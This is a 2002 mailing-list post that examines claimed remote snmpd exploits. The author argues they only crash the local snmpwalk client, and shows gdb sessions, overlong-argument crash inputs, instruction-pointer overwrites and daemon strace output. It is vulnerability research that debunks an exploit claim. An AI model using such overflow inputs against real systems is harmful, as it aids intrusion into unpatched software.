Vulnerability Development mailing list archives

snmpd exploit examination - snmpwalk

From: KF <dotslash () snosoft com>
Date: Wed, 20 Feb 2002 16:14:50 -0500
I am not so sure about those proof of concept remote snmp exploits that were posted... they look more like
local exploits to me.

[root@linuxppc root]# ps -ef | grep snmp
root      6355     1 17 15:02 pts/1    00:00:59 /usr/sbin/snmpd -s -l /dev/null

(gdb) r  127.0.0.1 public `perl -e 'print "A" x 293'`
Starting program: /usr/bin/snmpwalk 127.0.0.1 public `perl -e 'print "A" x 293'`
Program received signal SIGSEGV, Segmentation fault.
0x0ff963c0 in read_objid () from /usr/lib/libsnmp-0.4.2.1.so
(gdb) bt
#0  0x0ff963c0 in read_objid () from /usr/lib/libsnmp-0.4.2.1.so
#1  0x0ff99358 in snmp_parse_oid () from /usr/lib/libsnmp-0.4.2.1.so
#2  0x10000e28 in _init ()
#3  0x0fc6eb90 in __libc_start_main () from /lib/libc.so.6

(gdb) r  127.0.0.1 public `perl -e 'print "A" x 308'`  
Starting program: /usr/bin/snmpwalk 127.0.0.1 public `perl -e 'print "A" x 308'`    
Program received signal SIGILL, Illegal instruction.
0x41414100 in ?? ()

(gdb) r  127.0.0.1 public `perl -e 'print "A" x 309'` 
Starting program: /usr/bin/snmpwalk 127.0.0.1 public `perl -e 'print "A" x 309'`    
Program received signal SIGILL, Illegal instruction.
0x41414140 in ?? ()

This is snmpwalk NOT snmpd dying... 

[root@linuxppc root]# ps -ef | grep snmp
root      6355     1  5 15:02 pts/1    00:00:59 /usr/sbin/snmpd -s -l /dev/null

Still running... 

Ok lets use a newer version of snmpwalk
[root@linuxppc ucd-snmp-4.2.2]# apps/snmpwalk 127.0.0.1 public `perl -e 'print "A" x 309'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA:
 Unknown Object Identifier 
(AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA)

[root@linuxppc root]# ps -ef | grep snmp
root      6355     1  4 15:02 pts/1    00:00:59 /usr/sbin/snmpd -s -l /dev/null

still running... 

These are the examples I have seen in various emails as methods to exploit snmpd...These seem to do
nothing on my box to the client or the daemon...

        snmpwalk 127.0.0.1 `perl -e 'print "\x90" x 256'`
        execl("snmpwalk", "snmpwalk", "-p", port, host, buf, NULL);     
        execl("/usr/local/bin/snmpwalk","snmpwalk",argv[1],"-c",buffer,NULL);   

Here are my results. 
[root@linuxppc mail.snosoft.com]# snmpwalk 127.0.0.1 -c `perl -e 'print "A" x 256'`
Timeout: No Response from 127.0.0.1

[root@linuxppc mail.snosoft.com]# snmpwalk 127.0.0.1 `perl -e 'print "\x90" x 450'`
Timeout: No Response from 127.0.0.1

[root@linuxppc mail.snosoft.com]# snmpwalk -p 161 127.0.0.1 `perl -e 'print "A" x 4050'`
Timeout: No Response from 127.0.0.1

Addtional findings.
[root@linuxppc mail.snosoft.com]# snmpwalk -p 161 127.0.0.1 public `perl -e 'print "A" x 4050'`
Segmentation fault

[root@linuxppc mail.snosoft.com]#  snmpwalk 127.0.0.1 -c public `perl -e 'print "A" x 4050'`
Segmentation fault

Mean while the daemon reads the requests with no problems...
[0fc4abcc] _newselect(0x5, 0x7fffe808, 0x7fffe888, 0x7fffe908, 0) = 1
[0fc5211c] recvfrom(4, "0\202\1\352\2\1\0\4\202\1\310\220\220\220\220\220\220\220"..., 8192, 0,
{sin_family=AF_INET, sin_port=htons(32795), sin_addr=inet_addr("127.0.0.1")}}, [16]) = 494
[0fc142b4] gettimeofday({1014238429, 731763}, NULL) = 0
[0fc4abcc] _newselect(0x5, 0x7fffe808, 0x7fffe888, 0x7fffe908, 0) = 1
[0fc5211c] recvfrom(4, "0\202\1\352\2\1\0\4\202\1\310\220\220\220\220\220\220\220"..., 8192, 0,
{sin_family=AF_INET, sin_port=htons(32795), sin_addr=inet_addr("127.0.0.1")}}, [16]) = 494
[0fc142b4] gettimeofday({1014238430, 739274}, NULL) = 0

[root@linuxppc mail.snosoft.com]# snmpwalk 127.0.0.1 `perl -e 'print "\x90" x 3999'`
Timeout: No Response from 127.0.0.1

[0fc5211c] recvfrom(4, "0\202\17\301\2\1\0\4\202\17\237\220\220\220\220\220\220"..., 8192, 0,
{sin_family=AF_INET, sin_port=htons(32795), sin_addr=inet_addr("127.0.0.1")}}, [16]) = 4037
[0fc142b4] gettimeofday({1014238568, 885323}, NULL) = 0
[0fc4abcc] _newselect(0x5, 0x7fffe808, 0x7fffe888, 0x7fffe908, 0) = 1
[0fc5211c] recvfrom(4, "0\202\17\301\2\1\0\4\202\17\237\220\220\220\220\220\220"..., 8192, 0,
{sin_family=AF_INET, sin_port=htons(32795), sin_addr=inet_addr("127.0.0.1")}}, [16]) = 4037

Give it too many chars and snmpwalk complains. 
[root@linuxppc mail.snosoft.com]# snmpwalk 127.0.0.1 `perl -e 'print "\x90" x 5000'`
snmpwalk: Error building ASN.1 representation

Again YOUR results may vary ... these are mine. 

-KF
Current thread:

snmpd exploit examination - snmpwalk KF (Feb 21)
- Re: snmpd exploit examination - snmpwalk Syzop (Feb 21)
- Message not available
  - Re: snmpd exploit examination - snmpwalk KF (Feb 21)
- Re: snmpd exploit examination - snmpwalk xbud (Feb 21)
- <Possible follow-ups>
- Re: snmpd exploit examination - snmpwalk The Itch (Feb 21)